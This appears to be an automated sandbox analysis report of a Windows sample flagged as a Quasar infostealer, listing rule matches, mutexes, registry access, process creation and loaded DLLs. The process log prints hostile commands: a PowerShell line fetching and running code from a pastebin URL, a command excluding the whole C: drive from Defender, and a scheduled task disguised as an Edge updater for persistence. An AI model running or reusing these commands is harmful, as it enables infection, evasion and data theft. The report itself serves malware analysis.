Source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer

Source: ST.exe.1.dr, m3D2P.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ST.exe.1.dr, a9C1Y.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@37/43@5/7

Source: C:\Users\user\Desktop\lO5lV39HDj.exe

File created: C:\Users\user\AppData\Roaming\notification_sent.flag

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\RepulsiveRat
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5100:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\70595b2f-92ed-4cab-b358-5e9c155366b4

Source: C:\Users\user\Desktop\lO5lV39HDj.exe

File created: C:\Users\user\AppData\Local\Temp\yasv1c1l.2ds

Jump to behavior

Source: C:\Users\user\Downloads\BT.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lO5lV39HDj.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: regsvr32.exe

String found in binary or memory: Conflicting item/add type

Source: unknown	Process created: C:\Users\user\Desktop\lO5lV39HDj.exe "C:\Users\user\Desktop\lO5lV39HDj.exe"
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5891.tmp" "c:\Users\user\AppData\Local\Temp\0nzyxcux\CSC9B1D91995BDA47B39210566D4DA539B4.TMP"
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Users\user\Downloads\BT.exe "C:\Users\user\Downloads\BT.exe"
Source: C:\Users\user\Downloads\BT.exe	Process created: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp "C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp" /SL5="$F001C,2956477,245248,C:\Users\user\Downloads\BT.exe"
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process created: C:\Users\user\Downloads\BT.exe "C:\Users\user\Downloads\BT.exe" /VERYSILENT
Source: C:\Users\user\Downloads\BT.exe	Process created: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp "C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp" /SL5="$401C6,2956477,245248,C:\Users\user\Downloads\BT.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Users\user\Downloads\ST.exe "C:\Users\user\Downloads\ST.exe"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{05493815-7F3D-43AF-9EBD-81B00854A622}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Downloads\ST.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Users\user\Downloads\BT.exe "C:\Users\user\Downloads\BT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process created: C:\Users\user\Downloads\ST.exe "C:\Users\user\Downloads\ST.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5891.tmp" "c:\Users\user\AppData\Local\Temp\0nzyxcux\CSC9B1D91995BDA47B39210566D4DA539B4.TMP"	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Process created: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp "C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp" /SL5="$F001C,2956477,245248,C:\Users\user\Downloads\BT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process created: C:\Users\user\Downloads\BT.exe "C:\Users\user\Downloads\BT.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Process created: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp "C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp" /SL5="$401C6,2956477,245248,C:\Users\user\Downloads\BT.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{05493815-7F3D-43AF-9EBD-81B00854A622}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Users\user\Downloads\ST.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: wshunix.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Section loaded: uxtheme.dll	Jump to behavior
